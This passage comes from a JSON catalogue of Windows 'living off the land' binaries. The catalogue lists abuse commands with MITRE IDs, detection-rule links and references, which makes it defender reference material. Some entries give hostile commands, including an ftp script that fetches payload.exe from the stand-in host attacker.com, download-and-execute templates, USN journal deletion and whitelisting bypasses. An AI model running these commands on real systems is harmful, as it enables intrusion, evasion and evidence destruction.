evasion","mitre":["T1562.001"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\fltMC.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_fltmc_unload_driver_sysmon.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_via_filter_manager.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/unload_sysmon_filter_driver.yml"},{"type":"IOC","value":"4688 events with fltMC.exe"}],"references":["https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon","https://lolbas-project.github.io/lolbas/Binaries/fltMC/"]},{"id":"lolbas:forfiles-exe:0","toolId":"lolbas:forfiles-exe","toolName":"Forfiles.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"forfiles /p c:\\windows\\system32 /m notepad.exe /c \"{CMD}\"","description":"Executes specified command since there is a match for notepad.exe in the c:\\windows\\System32 folder.","usecase":"Use forfiles to start a new process to evade defensive counter measures","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\forfiles.exe","C:\\Windows\\SysWOW64\\forfiles.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_forfiles.yml"}],"references":["https://twitter.com/vector_sec/status/896049052642533376","https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://lolbas-project.github.io/lolbas/Binaries/Forfiles/"]},{"id":"lolbas:forfiles-exe:1","toolId":"lolbas:forfiles-exe","toolName":"Forfiles.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"forfiles /p c:\\windows\\system32 /m notepad.exe /c \"{PATH_ABSOLUTE}:evil.exe\"","description":"Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\\windows\\system32 folder.","usecase":"Use forfiles to start a new process from a binary hidden in an alternate data stream","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\forfiles.exe","C:\\Windows\\SysWOW64\\forfiles.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_forfiles.yml"}],"references":["https://twitter.com/vector_sec/status/896049052642533376","https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://lolbas-project.github.io/lolbas/Binaries/Forfiles/"]},{"id":"lolbas:fsutil-exe:0","toolId":"lolbas:fsutil-exe","toolName":"Fsutil.exe","name":"Tamper","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Tamper"],"command":"fsutil.exe file setZeroData offset=0 length=9999999999 {PATH_ABSOLUTE}","description":"Zero out a file","usecase":"Can be used to forensically erase a file","mitre":["T1485"],"privilege":"user","fullPath":["C:\\Windows\\System32\\fsutil.exe","C:\\Windows\\SysWOW64\\fsutil.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"fsutil.exe should not be run on a normal workstation"},{"type":"IOC","value":"file setZeroData (not case-sensitive) in the process arguments"},{"type":"IOC","value":"Sysmon Event ID 1"},{"type":"IOC","value":"Execution of process fsutil.exe with trace decode could be suspicious"},{"type":"IOC","value":"Non-Windows netsh.exe execution"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/ff5102832031425f6eed011dd3a2e62653008c94/rules/windows/process_creation/proc_creation_win_susp_fsutil_usage.yml"}],"references":["https://twitter.com/0gtweet/status/1720724516324704404","https://lolbas-project.github.io/lolbas/Binaries/Fsutil/"]},{"id":"lolbas:fsutil-exe:1","toolId":"lolbas:fsutil-exe","toolName":"Fsutil.exe","name":"Tamper","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Tamper"],"command":"fsutil.exe usn deletejournal /d c:","description":"Delete the USN journal volume to hide file creation activity","usecase":"Can be used to hide file creation activity","mitre":["T1485"],"privilege":"user","fullPath":["C:\\Windows\\System32\\fsutil.exe","C:\\Windows\\SysWOW64\\fsutil.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"fsutil.exe should not be run on a normal workstation"},{"type":"IOC","value":"file setZeroData (not case-sensitive) in the process arguments"},{"type":"IOC","value":"Sysmon Event ID 1"},{"type":"IOC","value":"Execution of process fsutil.exe with trace decode could be suspicious"},{"type":"IOC","value":"Non-Windows netsh.exe execution"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/ff5102832031425f6eed011dd3a2e62653008c94/rules/windows/process_creation/proc_creation_win_susp_fsutil_usage.yml"}],"references":["https://twitter.com/0gtweet/status/1720724516324704404","https://lolbas-project.github.io/lolbas/Binaries/Fsutil/"]},{"id":"lolbas:fsutil-exe:2","toolId":"lolbas:fsutil-exe","toolName":"Fsutil.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"fsutil.exe trace decode","description":"Executes a pre-planted binary named netsh.exe from the current directory.","usecase":"Spawn a pre-planted executable from fsutil.exe.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\fsutil.exe","C:\\Windows\\SysWOW64\\fsutil.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"fsutil.exe should not be run on a normal workstation"},{"type":"IOC","value":"file setZeroData (not case-sensitive) in the process arguments"},{"type":"IOC","value":"Sysmon Event ID 1"},{"type":"IOC","value":"Execution of process fsutil.exe with trace decode could be suspicious"},{"type":"IOC","value":"Non-Windows netsh.exe execution"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/ff5102832031425f6eed011dd3a2e62653008c94/rules/windows/process_creation/proc_creation_win_susp_fsutil_usage.yml"}],"references":["https://twitter.com/0gtweet/status/1720724516324704404","https://lolbas-project.github.io/lolbas/Binaries/Fsutil/"]},{"id":"lolbas:ftp-exe:0","toolId":"lolbas:ftp-exe","toolName":"Ftp.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"echo !{CMD} > ftpcommands.txt && ftp -s:ftpcommands.txt","description":"Executes the commands you put inside the text file.","usecase":"Spawn new process using ftp.exe. Ftp.exe runs cmd /C YourCommand","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\ftp.exe","C:\\Windows\\SysWOW64\\ftp.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_ftp.yml"},{"type":"IOC","value":"cmd /c as child process of ftp.exe"}],"references":["https://twitter.com/0xAmit/status/1070063130636640256","https://medium.com/@0xamit/lets-talk-about-security-research-discoveries-and-proper-discussion-etiquette-on-twitter-10f9be6d1939","https://ss64.com/nt/ftp.html","https://www.asafety.fr/vuln-exploit-poc/windows-dos-powershell-upload-de-fichier-en-ligne-de-commande-one-liner/","https://lolbas-project.github.io/lolbas/Binaries/Ftp/"]},{"id":"lolbas:ftp-exe:1","toolId":"lolbas:ftp-exe","toolName":"Ftp.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"cmd.exe /c \"@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v\"","description":"Download","usecase":"Spawn new process using ftp.exe. Ftp.exe downloads the binary.","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\ftp.exe","C:\\Windows\\SysWOW64\\ftp.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_ftp.yml"},{"type":"IOC","value":"cmd /c as child process of ftp.exe"}],"references":["https://twitter.com/0xAmit/status/1070063130636640256","https://medium.com/@0xamit/lets-talk-about-security-research-discoveries-and-proper-discussion-etiquette-on-twitter-10f9be6d1939","https://ss64.com/nt/ftp.html","https://www.asafety.fr/vuln-exploit-poc/windows-dos-powershell-upload-de-fichier-en-ligne-de-commande-one-liner/","https://lolbas-project.github.io/lolbas/Binaries/Ftp/"]},{"id":"lolbas:gpscript-exe:0","toolId":"lolbas:gpscript-exe","toolName":"Gpscript.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Gpscript /logon","description":"Executes logon scripts configured in Group Policy.","usecase":"Add local group policy logon script to execute file and hide from defensive counter measures","mitre":["T1218"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\gpscript.exe","C:\\Windows\\SysWOW64\\gpscript.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_gpscript.yml"},{"type":"IOC","value":"Scripts added in local group policy"},{"type":"IOC","value":"Execution of Gpscript.exe after logon"}],"references":["https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/","https://lolbas-project.github.io/lolbas/Binaries/Gpscript/"]},{"id":"lolbas:gpscript-exe:1","toolId":"lolbas:gpscript-exe","toolName":"Gpscript.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Gpscript /startup","description":"Executes startup scripts configured in Group Policy","usecase":"Add local group policy logon script to execute file and hide from defensive counter measures","mitre":["T1218"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\gpscript.exe","C:\\Windows\\SysWOW64\\gpscript.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_gpscript.yml"},{"type":"IOC","value":"Scripts added in local group policy"},{"type":"IOC","value":"Execution of Gpscript.exe after logon"}],"references":["https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/","https://lolbas-project.github.io/lolbas/Binaries/Gpscript/"]},{"id":"lolbas:hh-exe:0","toolId":"lolbas:hh-exe","toolName":"Hh.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"HH.exe {REMOTEURL:.bat}","description":"Open the target batch script with HTML Help.","usecase":"Download files from url","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\hh.exe","C:\\Windows\\SysWOW64\\hh.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hh_chm_execution.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hh_html_help_susp_child_process.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/execution_via_compiled_html_file.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_html_help_spawn_child_process.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_html_help_url_in_command_line.yml"}],"references":["https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/","https://lolbas-project.github.io/lolbas/Binaries/Hh/"]},{"id":"lolbas:hh-exe:1","toolId":"lolbas:hh-exe","toolName":"Hh.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"HH.exe {PATH_ABSOLUTE:.exe}","description":"Executes specified executable with HTML Help.","usecase":"Execute process with HH.exe","mitre":["T1218.001"],"privilege":"user","fullPath":["C:\\Windows\\hh.exe","C:\\Windows\\SysWOW64\\hh.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hh_chm_execution.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hh_html_help_susp_child_process.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/execution_via_compiled_html_file.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_html_help_spawn_child_process.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_html_help_url_in_command_line.yml"}],"references":["https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/","https://lolbas-project.github.io/lolbas/Binaries/Hh/"]},{"id":"lolbas:hh-exe:2","toolId":"lolbas:hh-exe","toolName":"Hh.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"HH.exe {REMOTEURL:.chm}","description":"Executes a remote .chm file which can contain commands.","usecase":"Execute commands with HH.exe","mitre":["T1218.001"],"privilege":"user","fullPath":["C:\\Windows\\hh.exe","C:\\Windows\\SysWOW64\\hh.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hh_chm_execution.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hh_html_help_susp_child_process.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/execution_via_compiled_html_file.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_html_help_spawn_child_process.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_html_help_url_in_command_line.yml"}],"references":["https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/","https://lolbas-project.github.io/lolbas/Binaries/Hh/"]},{"id":"lolbas:imewdbld-exe:0","toolId":"lolbas:imewdbld-exe","toolName":"IMEWDBLD.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"C:\\Windows\\System32\\IME\\SHARED\\IMEWDBLD.exe {REMOTEURL}","description":"IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to INetCache.","usecase":"Download file from Internet","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\IME\\SHARED\\IMEWDBLD.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/network_connection/net_connection_win_imewdbld.yml"}],"references":["https://twitter.com/notwhickey/status/1367493406835040265","https://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/"]},{"id":"lolbas:ie4uinit-exe:0","toolId":"lolbas:ie4uinit-exe","toolName":"Ie4uinit.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"ie4uinit.exe -BaseSettings","description":"Executes commands from a specially prepared ie4uinit.inf file.","usecase":"Get code execution by copy files to another location","mitre":["T1218"],"privilege":"user","fullPath":["c:\\windows\\system32\\ie4uinit.exe","c:\\windows\\sysWOW64\\ie4uinit.exe","c:\\windows\\system32\\ieuinit.inf","c:\\windows\\sysWOW64\\ieuinit.inf"],"toolType":"Binary","detection":[{"type":"IOC","value":"ie4uinit.exe copied outside of %windir%"},{"type":"IOC","value":"ie4uinit.exe loading an inf file (ieuinit.inf) from outside %windir%"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/process_creation/proc_creation_win_lolbin_ie4uinit.yml"}],"references":["https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/","https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/"]},{"id":"lolbas:iediagcmd-exe:0","toolId":"lolbas:iediagcmd-exe","toolName":"iediagcmd.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"set windir=c:\\test& cd \"C:\\Program Files\\Internet Explorer\\\" & iediagcmd.exe /out:{PATH_ABSOLUTE:.cab}","description":"Executes binary that is pre-planted at C:\\test\\system32\\netsh.exe.","usecase":"Spawn a pre-planted executable from iediagcmd.exe.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Program Files\\Internet Explorer\\iediagcmd.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/manasmbellani/mycode_public/blob/master/sigma/rules/win_proc_creation_lolbin_iediagcmd.yml"},{"type":"IOC","value":"Sysmon Event ID 1"},{"type":"IOC","value":"Execution of process iediagcmd.exe with /out could be suspicious"}],"references":["https://twitter.com/Hexacorn/status/1507516393859731456","https://lolbas-project.github.io/lolbas/Binaries/iediagcmd/"]},{"id":"lolbas:ieexec-exe:0","toolId":"lolbas:ieexec-exe","toolName":"Ieexec.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"ieexec.exe {REMOTEURL:.exe}","description":"Downloads and executes executable from the remote server.","usecase":"Download and run attacker code from remote location","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\ieexec.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\ieexec.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_ieexec_download.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"IOC","value":"Network connections originating from ieexec.exe may be suspicious"}],"references":["https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/","https://lolbas-project.github.io/lolbas/Binaries/Ieexec/"]},{"id":"lolbas:ieexec-exe:1","toolId":"lolbas:ieexec-exe","toolName":"Ieexec.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"ieexec.exe {REMOTEURL:.exe}","description":"Downloads and executes executable from the remote server.","usecase":"Download and run attacker code from remote location","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\ieexec.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\ieexec.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_ieexec_download.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"IOC","value":"Network connections originating from ieexec.exe may be suspicious"}],"references":["https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/","https://lolbas-project.github.io/lolbas/Binaries/Ieexec/"]},{"id":"lolbas:ilasm-exe:0","toolId":"lolbas:ilasm-exe","toolName":"Ilasm.exe","name":"Compile","source":"LOLBAS","platform":["Windows"],"capability":["Compile"],"nativeCategory":["Compile"],"command":"ilasm.exe {PATH_ABSOLUTE:.txt} /exe","description":"Binary file used by .NET to compile C#/intermediate (IL) code to .exe","usecase":"Compile attacker code on system. Bypass defensive counter measures.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ilasm.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ilasm.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"Ilasm may not be used often in production environments (such as on endpoints)"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/process_creation/proc_creation_win_lolbin_ilasm.yml"}],"references":["https://github.com/LuxNoBulIshit/BeforeCompileBy-ilasm/blob/master/hello_world.txt","https://lolbas-project.github.io/lolbas/Binaries/Ilasm/"]},{"id":"lolbas:ilasm-exe:1","toolId":"lolbas:ilasm-exe","toolName":"Ilasm.exe","name":"Compile","source":"LOLBAS","platform":["Windows"],"capability":["Compile"],"nativeCategory":["Compile"],"command":"ilasm.exe {PATH_ABSOLUTE:.txt} /dll","description":"Binary file used by .NET to compile C#/intermediate (IL) code to dll","usecase":"A description of the usecase","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ilasm.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ilasm.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"Ilasm may not be used often in production environments (such as on endpoints)"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/process_creation/proc_creation_win_lolbin_ilasm.yml"}],"references":["https://github.com/LuxNoBulIshit/BeforeCompileBy-ilasm/blob/master/hello_world.txt","https://lolbas-project.github.io/lolbas/Binaries/Ilasm/"]},{"id":"lolbas:infdefaultinstall-exe:0","toolId":"lolbas:infdefaultinstall-exe","toolName":"Infdefaultinstall.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"InfDefaultInstall.exe {PATH:.inf}","description":"Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.","usecase":"Code execution","mitre":["T1218"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\Infdefaultinstall.exe","C:\\Windows\\SysWOW64\\Infdefaultinstall.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_infdefaultinstall_execute_sct_scripts.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"}],"references":["https://twitter.com/KyleHanslovan/status/911997635455852544","https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/","https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/","https://lolbas-project.github.io/lolbas/Binaries/Infdefaultinstall/"]},{"id":"lolbas:installutil-exe:0","toolId":"lolbas:installutil-exe","toolName":"Installutil.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"InstallUtil.exe /logfile= /LogToConsole=false /U {PATH:.dll}","description":"Execute the target .NET DLL or EXE.","usecase":"Use to execute code and bypass application whitelisting","mitre":["T1218.004"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\InstallUtil.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\InstallUtil.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_instalutil_no_log_execution.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_installutil_download.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_installutil_beacon.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"}],"references":["https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/","https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md","https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool","https://lolbas-project.github.io/lolbas/Binaries/Installutil/"]},{"id":"lolbas:installutil-exe:1","toolId":"lolbas:installutil-exe","toolName":"Installutil.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"InstallUtil.exe /logfile= /LogToConsole=false /U {PATH:.dll}","description":"Execute the target .NET DLL or EXE.","usecase":"Use to execute code and bypass application whitelisting","mitre":["T1218.004"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\InstallUtil.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\InstallUtil.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_instalutil_no_log_execution.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_installutil_download.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_installutil_beacon.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"}],"references":["https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/","https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md","https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool","https://lolbas-project.github.io/lolbas/Binaries/Installutil/"]},{"id":"lolbas:installutil-exe:2","toolId":"lolbas:installutil-exe","toolName":"Installutil.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"InstallUtil.exe 